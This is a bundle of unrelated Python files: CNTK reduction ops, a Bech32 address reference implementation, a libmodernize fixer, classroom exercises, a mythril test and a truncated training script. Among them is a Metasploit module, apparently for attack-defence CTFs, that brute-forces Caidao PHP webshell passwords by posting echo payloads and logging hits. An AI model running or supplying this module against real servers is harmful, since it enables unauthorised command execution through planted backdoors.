If axis == 0 the reduction is taken over all tensor values, and the result is a tensor of rank one with one dimension.
Args:
value (list): list of input tensors
axis (int): axis to reduce. For axis==0 the whole tensor is reduce into one value.
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import ReduceMax
op = ReduceMax(value, axis=axis, name=name)
wrap_numpy_arrays(op)
op.axis = abs(axis) if axis<0 else op.z.rank - axis
op.rank = 0 if op.axis == 0 else op.z.rank
return op
def reduce_min(value, axis=0, name=None):
"""
For axis >= 1 computes the minimum of a tensor along the specifed axis. In the result the corresponding axis is dropped, i.e. the rank of the result tensore is smaller that the rank of the input tensor.
If axis == 0 the reduction is taken over all tensor values, and the result is a tensor of rank one with one dimension.
Args:
value (list): list of input tensors
axis (int): axis to reduce. For axis==0 the whole tensor is reduce into one value.
name (str): the name of the node in the network
Returns:
:class:`cntk.graph.ComputationNode`
"""
from cntk.ops.cntk1 import ReduceMin
op = ReduceMin(value, axis=axis, name=name)
wrap_numpy_arrays(op)
op.axis = abs(axis) if axis<0 else op.z.rank - axis
op.rank = 0 if op.axis == 0 else op.z.rank
return op
|
from __future__ import generator_stop
from fissix import fixer_base, fixer_util
import libmodernize
class FixBasestring(fixer_base.BaseFix):
BM_compatible = True
PATTERN = """'basestring'"""
def transform(self, node, results):
libmodernize.touch_import(None, "six", node)
return fixer_util.Name("six.string_types", prefix=node.prefix)
|
#!/usr/bin/env python3
# Copyright (c) 2017 Pieter Wuille
# Copyright (c) Flo Developers 2013-2021
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Reference implementation for Bech32/Bech32m and segwit addresses."""
import unittest
from enum import Enum
CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
BECH32_CONST = 1
BECH32M_CONST = 0x2bc830a3
class Encoding(Enum):
"""Enumeration type to list the various supported encodings."""
BECH32 = 1
BECH32M = 2
def bech32_polymod(values):
"""Internal function that computes the Bech32 checksum."""
generator = [0x3b6a57b2, 0x26508e6d, 0x1ea119fa, 0x3d4233dd, 0x2a1462b3]
chk = 1
for value in values:
top = chk >> 25
chk = (chk & 0x1ffffff) << 5 ^ value
for i in range(5):
chk ^= generator[i] if ((top >> i) & 1) else 0
return chk
def bech32_hrp_expand(hrp):
"""Expand the HRP into values for checksum computation."""
return [ord(x) >> 5 for x in hrp] + [0] + [ord(x) & 31 for x in hrp]
def bech32_verify_checksum(hrp, data):
"""Verify a checksum given HRP and converted data characters."""
check = bech32_polymod(bech32_hrp_expand(hrp) + data)
if check == BECH32_CONST:
return Encoding.BECH32
elif check == BECH32M_CONST:
return Encoding.BECH32M
else:
return None
def bech32_create_checksum(encoding, hrp, data):
"""Compute the checksum values given HRP and data."""
values = bech32_hrp_expand(hrp) + data
const = BECH32M_CONST if encoding == Encoding.BECH32M else BECH32_CONST
polymod = bech32_polymod(values + [0, 0, 0, 0, 0, 0]) ^ const
return [(polymod >> 5 * (5 - i)) & 31 for i in range(6)]
def bech32_encode(encoding, hrp, data):
"""Compute a Bech32 or Bech32m string given HRP and data values."""
combined = data + bech32_create_checksum(encoding, hrp, data)
return hrp + '1' + ''.join([CHARSET[d] for d in combined])
def bech32_decode(bech):
"""Validate a Bech32/Bech32m string, and determine HRP and data."""
if ((any(ord(x) < 33 or ord(x) > 126 for x in bech)) or
(bech.lower() != bech and bech.upper() != bech)):
return (None, None, None)
bech = bech.lower()
pos = bech.rfind('1')
if pos < 1 or pos + 7 > len(bech) or len(bech) > 90:
return (None, None, None)
if not all(x in CHARSET for x in bech[pos+1:]):
return (None, None, None)
hrp = bech[:pos]
data = [CHARSET.find(x) for x in bech[pos+1:]]
encoding = bech32_verify_checksum(hrp, data)
if encoding is None:
return (None, None, None)
return (encoding, hrp, data[:-6])
def convertbits(data, frombits, tobits, pad=True):
"""General power-of-2 base conversion."""
acc = 0
bits = 0
ret = []
maxv = (1 << tobits) - 1
max_acc = (1 << (frombits + tobits - 1)) - 1
for value in data:
if value < 0 or (value >> frombits):
return None
acc = ((acc << frombits) | value) & max_acc
bits += frombits
while bits >= tobits:
bits -= tobits
ret.append((acc >> bits) & maxv)
if pad:
if bits:
ret.append((acc << (tobits - bits)) & maxv)
elif bits >= frombits or ((acc << (tobits - bits)) & maxv):
return None
return ret
def decode_segwit_address(hrp, addr):
"""Decode a segwit address."""
encoding, hrpgot, data = bech32_decode(addr)
if hrpgot != hrp:
return (None, None)
decoded = convertbits(data[1:], 5, 8, False)
if decoded is None or len(decoded) < 2 or len(decoded) > 40:
return (None, None)
if data[0] > 16:
return (None, None)
if data[0] == 0 and len(decoded) != 20 and len(decoded) != 32:
return (None, None)
if (data[0] == 0 and encoding != Encoding.BECH32) or (data[0] != 0 and encoding != Encoding.BECH32M):
return (None, None)
return (data[0], decoded)
def encode_segwit_address(hrp, witver, witprog):
"""Encode a segwit address."""
encoding = Encoding.BECH32 if witver == 0 else Encoding.BECH32M
ret = bech32_encode(encoding, hrp, [witver] + convertbits(witprog, 8, 5))
if decode_segwit_address(hrp, ret) == (None, None):
return None
return ret
class TestFrameworkScript(unittest.TestCase):
def test_segwit_encode_decode(self):
def test_python_bech32(addr):
hrp = addr[:4]
self.assertEqual(hrp, "flort")
(witver, witprog) = decode_segwit_address(hrp, addr)
self.assertEqual(encode_segwit_address(hrp, witver, witprog), addr)
# P2WPKH
test_python_bech32('flort1qthmht0k2qnh3wy7336z05lu2km7emzfpm3wg46')
# P2WSH
test_python_bech32('flort1qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq3xueyj')
test_python_bech32('flort1qft5p2uhsdcdc3l2ua4ap5qqfg4pjaqlp250x7us7a8qqhrxrxfsqseac85')
# P2TR
test_python_bech32('flort1p0xlxvlhemja6c4dqv22uapctqupfhlxm9h8z3k2e72q4k9hcz7vqc8gma6')
|
# Ethan Tuning 2/6/2015
def sphereSurfaceArea(rad):
pi = 3.14159
surfaceArea = 4 * pi * rad ** 2
return surfaceArea
def sphereVolume(rad2):
pi = 3.14159
volume = (4/3) * pi * rad2 ** 3
return volume
def circleCircumference(rad3):
pi = 3.14159
circumference = 2 * pi * rad3
return circumference
def circleArea(rad4):
pi = 3.14159
area = pi * rad4 ** 2
return area
def radiusInfo(rad5):
print("Surface Area of Sphere of Radius" ,rad5, "is:" ,sphereSurfaceArea(rad5))
print("Volume of Sphere of radius" ,rad5, "is:" ,sphereVolume(rad5))
print("Circumference of circle of radius" ,rad5, "is:" ,circleCircumference(rad5))
print("Area of circle of radius" ,rad5, "is:" ,circleArea(rad5))
return
def radiusInfoUserInput():
rad6 = float(input("Enter a radius:"))
radiusInfo(rad6)
return
def main():
radiusInfo(6.1)
print()
radiusInfo(7.5)
print()
radiusInfo(8)
print()
radiusInfo(11.25)
print()
radiusInfoUserInput()
return
main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# standard modules
import logging
import sys
import random
import string
import os
# extra modules
dependencies_missing = False
try:
import requests
except ImportError:
dependencies_missing = True
# metasploit python module
from metasploit import module, login_scanner
metadata = {
'name': 'AWDFlagHunter utils: Caidao bruteforce login',
'description': '''
This module attempts to bruteforce caidao php backdoor.\n
Default PASS_FILE is caidao_pass.txt in the current directory.\n
Use creds command to see the result.\n
The result log in MODDULE_NAME.success.log with pattern ( http://ip/caidao.php pass )\n
''',
'authors': [
'dyz'
],
'date': '2020-03-22',
'references': [
],
'type': 'single_scanner',
'options': {
'SCHEMA': {'type': 'string', 'description': 'http or https ', 'required': True, 'default': 'http'},
'TARGETURI': {'type': 'string', 'description': 'The base path such as /a.php ', 'required': True, 'default': '/caidao.php'},
'RPORT': {'type': 'port', 'description': 'rport', 'required': True, 'default': 80},
'PASS_FILE': {'type': 'string', 'description': 'Default is caidao_pass.txt . ',
'required': False, 'default': None},
},
}
def run(args):
module.LogHandler.setup(msg_prefix='{}:{} - '.format(args['rhost'], args['RPORT']))
if dependencies_missing:
logging.error('Module dependency (requests) is missing, cannot continue.')
logging.error('use (pip install requests) to install the dependency.')
return
##
logging.debug('Module path:{}'.format(__file__))
##
pass_file = args["PASS_FILE"]
if pass_file == '':
pass_file = os.path.join(os.path.dirname(__file__),'caidao_pass.txt')
try:
with open(pass_file) as f:
passwords = f.readlines()
except FileNotFoundError as e:
logging.warning('Can`t find the pass file:{}.'.format(pass_file))
return
headers = {
"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
}
try:
for password in passwords:
password = password[:-1]
mark = ''.join(random.sample(string.ascii_letters, 10))
data = {
password: 'echo "{}";'.format(mark)
}
r = requests.post('{}://{}:{}{}'.format(args['SCHEMA'], args['rhost'], args['RPORT'], args['TARGETURI']),
data=data, headers=headers, verify=False,timeout=4)
if mark in r.text:
module.log('{} - Success:{}'.format(args['rhost'], password), level='good')
module.report_correct_password('', password)
with open(os.path.basename(__file__)+'.success.log','a') as f :
f.write('{}://{}:{}{} {}\n'.format(args['SCHEMA'], args['rhost'], args['RPORT'], args['TARGETURI'],password))
f.flush()
return
else:
logging.error('Failed: {}'.format(password))
r.close()
except requests.exceptions.RequestException as e:
logging.error('{}'.format(e))
if __name__ == '__main__':
module.run(metadata, run)
|
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
from sklearn import linear_model
import matplotlib.pyplot as plt
matplotlib.style.use('ggplot') # Look Pretty
def drawLine(model, X_test, y_test, title):
# This convenience method will take care of plotting your
# test observations, comparing them to the regression line,
# and displaying the R2 coefficient
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(X_test, y_test, c='g', marker='o')
ax.plot(X_test, model.predict(X_test), color='orange', linewidth=1, alpha=0.7)
print "Est 2014 " + title + " Life Expectancy: ", model.predict([[2014]])[0]
print "Est 2030 " + title + " Life Expectancy: ", model.predict([[2030]])[0]
print "Est 2045 " + title + " Life Expectancy: ", model.predict([[2045]])[0]
score = model.score(X_test, y_test)
title += " R2: " + str(score)
ax.set_title(title)
plt.show()
#
# TODO: Load up the data here into a variable called 'X'.
# As usual, do a .describe and a print of your dataset and
# compare it to the dataset loaded in a text file or in a
# spread sheet application
#
# .. your code here ..
X = pd.read_csv( 'Datasets/life_expectancy.csv' ,header=0 , sep='\t')
#
# TODO: Create your linear regression model here and store it in a
# variable called 'model'. Don't actually train or do anything else
# with it yet:
#
# .. your code here ..
model = linear_model.LinearRegression()
#
# TODO: Slice out your data manually (e.g. don't use train_test_split,
# but actually do the Indexing yourself. Set X_train to be year values
# LESS than 1986, and y_train to be corresponding WhiteMale age values.
#
# INFO You might also want to read the note about slicing on the bottom
# of this document before proceeding.
#
# .. your code here ..
X_train = X[['Year']].loc[X['Year']<1986]
y_train = X[['WhiteMale']].loc[X['Year']<1986]
print X_train
print y_train
#
# TODO: Train your model then pass it into drawLine with your training
# set and labels. You can title it "WhiteMale". drawLine will output
# to the console a 2014 extrapolation / approximation for what it
# believes the WhiteMale's life expectancy in the U.S. will be...
# given the pre-1986 data you trained it with. It'll also produce a
# 2030 and 2045 extrapolation.
#
# .. your code here ..
model.fit(X_train,y_train)
#linear_model.LinearRegression(copy_X=True, fit_intercept=True, n_jobs=1, normalize=False)
drawLine(model, X_train,y_train, "WhiteMale")
#
# TODO: Print the actual 2014 WhiteMale life expectancy from your
# loaded dataset
#
# .. your code here ..
print X.WhiteMale.loc[X['Year']==2014]
#
# TODO: Repeat the process, but instead of for WhiteMale, this time
# select BlackFemale. Create a slice for BlackFemales, fit your
# model, and then call drawLine. Lastly, print out the actual 2014
# BlackFemale life expectancy
#
# .. your code here ..
X_train = X[['Year']].loc[X['Year']<1986]
y_train = X[['BlackFemale']].loc[X['Year']<1986]
print X_train
print y_train
model.fit(X_train,y_train)
drawLine(model, X_train,y_train, "BlackFemale")
print X.BlackFemale.loc[X['Year']==2014]
#
# TODO: Lastly, print out a correlation matrix for your entire
# dataset, and display a visualization of the correlation
# matrix, just as we described in the visualization section of
# the course
#
# .. your code here ..
print X.corr()
#
# TODO: Graph the correlation matrix using imshow or matshow
#
plt.imshow(X.corr(), cmap=plt.cm.Blues, interpolation='nearest')
plt.colorbar()
tick_marks = [i for i in range(len(X.columns))]
plt.xticks(tick_marks, X.columns, rotation='vertical')
plt.yticks(tick_marks, X.columns)
plt.show()
plt.show()
#
# INFO + HINT On Fitting, Scoring, and Predicting:
#
# Here's a hint to help you complete the assignment without pulling
# your hair out! When you use .fit(), .score(), and .predict() on
# your model, SciKit-Learn expects your training data to be in
# spreadsheet (2D Array-Like) form. This means you can't simply
# pass in a 1D Array (slice) and get away with it.
#
# To properly prep your data, you have to pass in a 2D Numpy Array,
# or a dataframe. But what happens if you really only want to pass
# in a single feature?
#
# If you slice your dataframe using df[['ColumnName']] syntax, the
# result that comes back is actually a *dataframe*. Go ahead and do
# a type() on it to check it out. Since it's already a dataframe,
# you're good -- no further changes needed.
#
# But if you slice your dataframe using the df.ColumnName syntax,
# OR if you call df['ColumnName'], the result that comes back is
# actually a series (1D Array)! This will cause SKLearn to bug out.
# So if you are slicing using either of those two techniques, before
# sending your training or testing data to .fit / .score, do a
# my_column = my_column.reshape(-1,1). This will convert your 1D
# array of [n_samples], to a 2D array shaped like [n_samples, 1].
# A single feature, with many samples.
#
# If you did something like my_column = [my_column], that would produce
# an array in the shape of [1, n_samples], which is incorrect because
# SKLearn expects your data to be arranged as [n_samples, n_features].
# Keep in mind, all of the above only relates to your "X" or input
# data, and does not apply to your "y" or labels.
|
from mythril.disassembler.disassembly import Disassembly
from mythril.laser.ethereum.state.environment import Environment
from mythril.laser.ethereum.state.account import Account
from mythril.laser.ethereum.state.machine_state import MachineState
from mythril.laser.ethereum.state.global_state import GlobalState
from mythril.laser.ethereum.instructions import Instruction
def test_codecopy_concrete():
# Arrange
active_account = Account("0x0", code=Disassembly("60606040"))
environment = Environment(active_account, None, None, None, None, None)
og_state = GlobalState(None, environment, None, MachineState(gas=10000000))
og_state.mstate.stack = [2, 2, 2]
instruction = Instruction("codecopy", dynamic_loader=None)
# Act
new_state = instruction.evaluate(og_state)[0]
# Assert
assert new_state.mstate.memory[2] == 96
assert new_state.mstate.memory[3] == 64
|
import random
import signal
import sys
from abc import abstractmethod
from itertools import islice
from statistics import mean
import torch
from sacred import Experiment
from torch import optim
from torch.utils.data import DataLoader
from tqdm import tqdm
from code_transformer.configuration.transformer_lm_encoder import TransformerLMEncoderConfig
from code_transformer.experiments.log import ExperimentLogger, TensorboardLogger
from code_transformer.modeling.constants import PAD_TOKEN, UNKNOWN_TOKEN, EOS_TOKEN, NUM_SUB_TOKENS
from code_transformer.modeling.modelmanager import ModelManager
from code_transformer.modeling.modelmanager.code_transformer import CodeTransformerModelManager, \
CodeTransformerLMModelManager
from code_transformer.preprocessing.datamanager.base import batch_filter_distances, batch_to_device, \
DataLoaderWrapper, BufferedDataManager
from code_transformer.preprocessing.datamanager.preprocessed import CTBufferedDataManager
from code_transformer.preprocessing.dataset.lm import CTLanguageModelingDataset, \
CTLanguageModelingDatasetNoPunctuation
from code_transformer.preprocessing.graph.binning import ExponentialBinning, EqualBinning
from code_transformer.preprocessing.graph.distances import DistanceBinning
from code_transformer.preprocessing.graph.transform import MaxDistanceMaskTransform, TokenDistancesTransform
from code_transformer.utils.metrics import top1_accuracy, topk_accuracy, precision, recall, f1_score, \
non_trivial_words_accuracy, micro_f1_score, rouge_2, rouge_l
from code_transformer.utils.timing import Timing
from code_transformer.env import MODELS_SAVE_PATH, LOGS_PATH, DATA_PATH_STAGE_2
ex = Experiment(base_dir='../../', interactive=False)
class ExperimentSetup:
def __init__(self):
self._init_config()
self._init_data_transforms()
self._init_data()
self._init_transfer_learning()
self._init_model()
self._init_optimizer()
@ex.capture
def _init_config(self, _config):
self.config = _config
@ex.capture(prefix="data_transforms")
def _init_data_transforms(self, max_distance_mask, relative_distances, distance_binning):
self.max_distance_mask = None if max_distance_mask is None else MaxDistanceMaskTransform(max_distance_mask)
self.relative_distances = [] if relative_distances is None else relative_distances
if distance_binning['type'] == 'exponential':
trans_func = ExponentialBinning(distance_binning['growth_factor'])
else:
trans_func = EqualBinning()
self.distance_binning = {
'n_fixed_bins': distance_binning['n_fixed_bins'],
'trans_func': trans_func
}
@ex.capture(prefix="data_setup")
def _init_data(self, language, num_predict, use_validation=False, mini_dataset=False,
use_no_punctuation=False, use_pointer_network=False, sort_by_length=False, shuffle=True,
chunk_size=None, filter_language=None, dataset_imbalance=None, num_sub_tokens=NUM_SUB_TOKENS):
self.data_manager = CTBufferedDataManager(DATA_PATH_STAGE_2, language, shuffle=shuffle,
infinite_loading=True,
mini_dataset=mini_dataset, size_load_buffer=10000,
sort_by_length=sort_by_length, chunk_size=chunk_size,
filter_language=filter_language, dataset_imbalance=dataset_imbalance)
self.word_vocab, self.token_type_vocab, self.node_type_vocab = self.data_manager.load_vocabularies()
token_distances = None
if TokenDistancesTransform.name in self.relative_distances:
num_bins = self.data_manager.load_config()['binning']['num_bins']
token_distances = TokenDistancesTransform(
DistanceBinning(num_bins, self.distance_binning['n_fixed_bins'], self.distance_binning['trans_func']))
self.num_predict = num_predict
self.use_pointer_network = use_pointer_network
self.use_separate_vocab = False # For language modeling we always only operate on the method body vocabulary
if use_no_punctuation:
self.dataset_train = CTLanguageModelingDatasetNoPunctuation(self.data_manager,
token_distances=token_distances,
max_distance_mask=self.max_distance_mask,
num_labels_per_sample=num_predict,
use_pointer_network=use_pointer_network,
num_sub_tokens=num_sub_tokens)
else:
self.dataset_train = CTLanguageModelingDataset(self.data_manager, token_distances=token_distances,
max_distance_mask=self.max_distance_mask,
num_labels_per_sample=num_predict,
use_pointer_network=use_pointer_network,
num_sub_tokens=num_sub_tokens)
self.use_validation = use_validation
if self.use_validation:
data_manager_validation = CTBufferedDataManager(DATA_PATH_STAGE_2, language, partition="valid",
shuffle=True, infinite_loading=True,
mini_dataset=mini_dataset, size_load_buffer=10000,
filter_language=filter_language,
dataset_imbalance=dataset_imbalance)
if use_no_punctuation:
self.dataset_validation = CTLanguageModelingDatasetNoPunctuation(data_manager_validation,
token_distances=token_distances,
max_distance_mask=self.max_distance_mask,
num_labels_per_sample=num_predict,
use_pointer_network=use_pointer_network,
num_sub_tokens=num_sub_tokens)
else:
self.dataset_validation = CTLanguageModelingDataset(data_manager_validation,
token_distances=token_distances,
max_distance_mask=self.max_distance_mask,
num_labels_per_sample=num_predict,
use_pointer_network=use_pointer_network,
num_sub_tokens=num_sub_tokens)
self.dataset_validation_creator = \
lambda infinite_loading: self._create_validation_dataset(DATA_PATH_STAGE_2,
language,
use_no_punctuation,
token_distances,
infinite_loading,
num_predict,
use_pointer_network,
filter_language,
dataset_imbalance,
num_sub_tokens)
def _create_validation_dataset(self, data_location, language, use_no_punctuation, token_distances,
infinite_loading, num_predict, use_pointer_network, filter_language,
dataset_imbalance, num_sub_tokens):
data_manager_validation = CTBufferedDataManager(data_location, language, partition="valid",
shuffle=True, infinite_loading=infinite_loading,
size_load_buffer=10000, filter_language=filter_language,
dataset_imbalance=dataset_imbalance)
if use_no_punctuation:
return CTLanguageModelingDatasetNoPunctuation(data_manager_validation,
token_distances=token_distances,
max_distance_mask=self.max_distance_mask,
num_labels_per_sample=num_predict,
use_pointer_network=use_pointer_network,
num_sub_tokens=num_sub_tokens)
else:
return CTLanguageModelingDataset(data_manager_validation,
token_distances=token_distances,
max_distance_mask=self.max_distance_mask,
num_labels_per_sample=num_predict,
use_pointer_network=use_pointer_network,
num_sub_tokens=num_sub_tokens)
@ex.capture(prefix="transfer_learning")
def _init_transfer_learning(self, use_pretrained_model=False, model_type=None, run_id=None,
snapshot_iteration=None, cpu=False, freeze_encoder_layers=None):
assert not use_pretrained_model or (
run_id is not None
and snapshot_iteration is not None
and model_type is not None), "model_type, run_id and snapshot_iteration have to be provided if " \
"use_pretrained_model is set"
self.use_pretrained_model = use_pretrained_model
if use_pretrained_model:
print(
f"Using Transfer Learning. Loading snapshot snapshot-{snapshot_iteration} from run {run_id} in collection "
f"{model_type} ")
if model_type == 'ct_code_summarization':
model_manager = CodeTransformerModelManager()
pretrained_model = model_manager.load_model(run_id, snapshot_iteration, gpu=not cpu)
self.pretrained_model = pretrained_model
elif model_type == 'ct_lm':
model_manager = CodeTransformerLMModelManager()
pretrained_model = model_manager.load_model(run_id, snapshot_iteration, gpu=not cpu)
self.pretrained_model = pretrained_model
else:
model_manager = ModelManager(MODELS_SAVE_PATH, model_type)
self.pretrained_model_params = model_manager.load_parameters(run_id, snapshot_iteration, gpu=not cpu)
encoder_config = model_manager.load_config(run_id)['model']['transformer_lm_encoder']
self.pretrained_transformer_encoder_config = TransformerLMEncoderConfig(**encoder_config)
if freeze_encoder_layers is not None:
self.freeze_encoder_layers = freeze_encoder_layers
def generate_transformer_lm_encoder_config(self, transformer_lm_encoder: dict) -> TransformerLMEncoderConfig:
config = TransformerLMEncoderConfig(**transformer_lm_encoder)
if self.use_pretrained_model:
loaded_config = self.pretrained_transformer_encoder_config
if not config == self.pretrained_transformer_encoder_config:
print(f"pretrained configuration differs from given configuration. Pretrained: "
f"{self.pretrained_transformer_encoder_config}, Given: {config}. Try merging...")
loaded_config.input_nonlinearity = config.input_nonlinearity
loaded_config.transformer['encoder_layer']['dropout'] = config.transformer['encoder_layer']['dropout']
loaded_config.transformer['encoder_layer']['activation'] \
= config.transformer['encoder_layer']['activation']
config = loaded_config
transformer_config = dict(config.transformer)
if hasattr(self, "word_vocab"):
config.vocab_size = len(self.word_vocab)
if hasattr(self, "token_type_vocab"):
if hasattr(self, "use_only_ast") and self.use_only_ast:
config.num_token_types = None
else:
config.num_token_types = len(self.token_type_vocab)
if hasattr(self, "node_type_vocab"):
config.num_node_types = len(self.node_type_vocab)
if hasattr(self, "relative_distances"):
encoder_layer_config = dict(transformer_config['encoder_layer'])
encoder_layer_config['num_relative_distances'] = len(self.relative_distances)
transformer_config['encoder_layer'] = encoder_layer_config
if hasattr(self, "num_sub_tokens"):
config.subtokens_per_token = self.num_sub_tokens
if hasattr(self, 'num_languages'):
config.num_languages = self.num_languages
config.transformer = transformer_config
return config
@abstractmethod
def _init_model(self, *args, **kwargs):
self.model_lm = None
self.with_cuda = True
self.model_manager = None
@ex.capture(prefix="optimizer")
def _init_optimizer(self, learning_rate, reg_scale, scheduler=None, scheduler_params=None, optimizer="Adam"):
if optimizer == 'Adam':
self.optimizer = optim.Adam(self.model_lm.parameters(), lr=learning_rate, weight_decay=reg_scale)
elif optimizer == 'Momentum':
self.optimizer = optim.SGD(self.model_lm.parameters(), lr=learning_rate, weight_decay=reg_scale,
momentum=0.95, nesterov=True)
self.scheduler = None
if scheduler == 'OneCycleLR':
self.scheduler = optim.lr_scheduler.OneCycleLR(self.optimizer, **scheduler_params)
elif scheduler == 'MultiStepLR':
self.scheduler = optim.lr_scheduler.MultiStepLR(self.optimizer, **scheduler_params)
def _init_metrics(self, metrics):
self.metrics = dict()
pad_id = self.word_vocab[PAD_TOKEN]
unk_id = self.word_vocab[UNKNOWN_TOKEN]
for metric in metrics:
if metric == 'top1_accuracy':
self.metrics[metric] = top1_accuracy
self.metrics[f"{metric}_no_unk"] = lambda logits, labels: top1_accuracy(logits, labels,
unk_id=unk_id, pad_id=pad_id)
elif metric == 'top5_accuracy':
self.metrics[metric] = lambda logits, labels: topk_accuracy(5, logits, labels)
self.metrics[f"{metric}_no_unk"] = lambda logits, labels: topk_accuracy(5, logits, labels,
unk_id=unk_id, pad_id=pad_id)
elif metric == 'precision':
self.metrics[metric] = lambda logits, labels: precision(logits, labels, pad_id=pad_id)
self.metrics[f"{metric}_no_unk"] = lambda logits, labels: precision(logits, labels, pad_id=pad_id,
unk_id=unk_id)
elif metric == 'recall':
self.metrics[metric] = lambda logits, labels: recall(logits, labels, pad_id=pad_id)
self.metrics[f"{metric}_no_unk"] = lambda logits, labels: recall(logits, labels, pad_id=pad_id,
unk_id=unk_id)
elif metric == 'f1_score':
self.metrics[metric] = lambda logits, labels: f1_score(logits, labels, pad_id=pad_id)
self.metrics[f"{metric}_no_unk"] = lambda logits, labels: f1_score(logits, labels, pad_id=pad_id,
unk_id=unk_id)
elif metric == 'non_trivial_accuracy':
self.metrics[metric] = lambda logits, labels: non_trivial_words_accuracy(logits, labels, pad_id)
self.metrics[f"{metric}_no_unk"] = lambda logits, labels: non_trivial_words_accuracy(logits, labels,
pad_id,
unk_id=unk_id)
elif metric == 'micro_f1_score':
self.metrics[metric] = lambda logits, labels: micro_f1_score(logits, labels, pad_id=pad_id,
unk_id=unk_id)
elif metric == 'rouge_2':
self.metrics[metric] = lambda logits, labels: rouge_2(logits, labels, pad_id=pad_id)
elif metric == 'rouge_l':
self.metrics[metric] = lambda logits, labels: rouge_l(logits, labels, pad_id=pad_id)
@ex.capture(prefix="training")
def train(self, batch_size, simulated_batch_size, random_seed, metrics,
validate_every=None,
persistent_snapshot_every=None, simulated_batch_size_valid=None, early_stopping_patience=10,
max_validation_samples=10000, accumulate_tokens_batch=False):
if self.with_cuda:
self.model_lm = self.model_lm.cuda()
self.device = "cuda"
else:
self.device = "cpu"
run_id = self.model_manager.generate_run_name()
self.logger = ExperimentLogger("experiment",
TensorboardLogger(f"{LOGS_PATH}/{self.model_manager.model_type}/{run_id}"))
self.logger.info(f"===============================================")
self.logger.info(f"Starting run {run_id}")
self.logger.info(f"===============================================")
self.model_manager.save_config(run_id, self.config)
early_stopping = EarlyStopping(self.model_manager, run_id, early_stopping_patience)
num_params = sum([len(params.view(-1)) for params in self.model_lm.parameters()])
self.logger.info(f"Start training model with {num_params} parameters")
self.logger.info(f"Model setup: {self.model_lm}")
self._init_metrics(metrics)
torch.manual_seed(random_seed)
random.seed(random_seed)
# Simulated batches
simulated_batch_size = batch_size if simulated_batch_size is None else simulated_batch_size
assert simulated_batch_size % batch_size == 0, "simulated_batch_size must be a multiple of batch_size"
num_simulated_batches = simulated_batch_size // batch_size
# Main train loop
train_step = 0
dataloader = DataLoader(self.dataset_train, batch_size=batch_size, collate_fn=self.dataset_train.collate_fn)
if self.use_validation:
if simulated_batch_size_valid is None:
simulated_batch_size_valid = simulated_batch_size
num_simulated_batches_valid = simulated_batch_size_valid // batch_size
dataloader_validation = iter(DataLoader(self.dataset_validation, batch_size=batch_size,
collate_fn=self.dataset_validation.collate_fn))
n_tokens_accumulate_batch = None
if accumulate_tokens_batch:
n_tokens_accumulate_batch = 0
epoch = 1
progress_bar = tqdm(total=int(self.data_manager.approximate_total_samples() / batch_size))
progress_bar.set_description(f"Epoch {epoch}")
# Ensure graceful shutdown when training is interrupted
signal.signal(signal.SIGINT, self._handle_shutdown)
with Timing() as t:
for it, batch in enumerate(dataloader):
self.logger.log_time(t.measure() / batch_size, "dataloader_seconds/sample",
train_step * simulated_batch_size + (it % num_simulated_batches) * batch_size)
# Calculate gradients
batch = batch_filter_distances(batch, self.relative_distances)
model_out = self._train_step(batch, num_simulated_batches)
self.logger.log_time(t.measure() / batch_size, "model_seconds/sample",
train_step * simulated_batch_size + (it % num_simulated_batches) * batch_size)
# Log actual predicted words and labels
self.logger.log_text("input/train",
str([[self.word_vocab.reverse_lookup(st.item()) for st in token
if st.item() != self.word_vocab[PAD_TOKEN]
and st.item() != self.word_vocab[EOS_TOKEN]]
for token in batch.tokens[0]]))
self.logger.log_text("predicted words/train", str(self._decode_predicted_words(model_out, batch)))
self.logger.log_text("labels/train", str(self._decode_labels(batch)))
# Calculate metrics
evaluation = self._evaluate_predictions(model_out.logits, batch.labels, loss=model_out.loss)
self.logger.log_sub_batch_metrics(evaluation)
if accumulate_tokens_batch:
n_tokens_accumulate_batch += batch.sequence_lengths.sum().item()
# Gradient accumulation: only update gradients every num_simulated_batches step
if not accumulate_tokens_batch and it % num_simulated_batches == (num_simulated_batches - 1) \
or accumulate_tokens_batch and n_tokens_accumulate_batch > simulated_batch_size:
if accumulate_tokens_batch:
n_tokens_accumulate_batch = 0
train_step += 1
total_norm = 0
for p in self.model_lm.parameters():
if p.grad is not None:
param_norm = p.grad.data.norm(2)
total_norm += param_norm.item() ** 2
total_norm = total_norm ** (1. / 2)
self.logger.log_metrics({'gradient_norm': total_norm}, train_step * simulated_batch_size)
self.optimizer.step()
self.optimizer.zero_grad()
if self.scheduler:
if not hasattr(self.scheduler,
"total_steps") or train_step < self.scheduler.total_steps - 1:
self.scheduler.step()
self.logger.log_metrics({'lr': self.scheduler.get_lr()[0]},
train_step * simulated_batch_size)
# Send train metrics to observers
self.logger.flush_batch_metrics(train_step * simulated_batch_size)
# Evaluate on validation set
if self.use_validation and validate_every and train_step % validate_every == 0:
t.measure()
self.model_lm.eval()
with torch.no_grad():
for validation_batch in islice(dataloader_validation, num_simulated_batches_valid):
validation_batch = batch_filter_distances(validation_batch, self.relative_distances)
validation_batch = batch_to_device(validation_batch, self.device)
output = self.model_lm.forward_batch(validation_batch).cpu()
validation_batch = batch_to_device(validation_batch, "cpu")
evaluation = self._evaluate_predictions(output.logits, validation_batch.labels,
loss=output.loss, partition='valid')
self.logger.log_sub_batch_metrics(evaluation)
self.logger.log_text("predicted words/validation",
str(self._decode_predicted_words(output, validation_batch)))
self.logger.log_text("labels/validation",
str(self._decode_labels(validation_batch)))
self.model_lm.train()
self.logger.flush_batch_metrics(step=train_step * simulated_batch_size)
self.logger.log_time(t.measure() / simulated_batch_size_valid, "valid_seconds/sample",
train_step * simulated_batch_size)
if persistent_snapshot_every and (it + 1) % persistent_snapshot_every == 0:
snapshot_iteration = it + 1
self.logger.info(f"Storing model params into snapshot-{snapshot_iteration}")
self.model_manager.save_snapshot(run_id, self.model_lm.state_dict(), snapshot_iteration)
dataset = self.dataset_validation_creator(False)
